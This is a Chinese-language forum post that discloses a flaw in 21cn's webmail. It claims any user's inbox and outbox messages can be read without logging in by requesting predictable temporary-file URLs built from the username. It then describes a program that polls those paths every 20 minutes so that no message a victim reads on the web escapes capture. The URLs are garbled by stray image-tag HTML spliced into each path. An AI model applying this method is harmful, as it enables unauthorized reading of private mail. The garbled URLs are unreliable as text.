21cn的邮件系统的大BUG
我轻易地找到了21cn的邮件系统的大BUG。包括它的收费和免费系统!!用轻易的方法我就可以看任何21cn邮件用户信箱中的信件!!!!而且,这是一个根本系统漏洞。2 1cn难以短期内解决。21cn可能只能临时变变路径而已,问题难以短期解决。
我的办法是:
1:用户abc登陆后先后看了第1、2..封信。
2:如果此用户使用WEBMAIL的时间内或退出后30分钟内,在另外一台机器上IE地址栏内输入
http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt
http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt
...
上面字符串中的 /a/ ,其中a是其用户名abc的首位字母。
无需登陆即可取得用户abc的第1、2...封信的原码,虽然有些内容是经过编码,但只要以扩展名为.eml另存到本地即可用OUTLOOK看到全部内容。这是个大漏洞,谁都可以轻易利用。而且举一个很简单的例子:
我想窃取abc的信,只要用户abc是21cn的用户,且可能会使用21cn的web方式收发信,那么我只要编写一个程序,每20分钟轮流访问一遍下列地址:看abc收件箱里的内容 http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt
http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt
... http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/500/message.txt
看abc发件箱的内容 http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/1/message.txt
http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/2/message.txt
... http://webmail.21cn.net/tmp/a/abc
src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/500/message.txt
只要此程序一直运行,用户在WEB上的查看后的信件没有一封能够逃掉。
|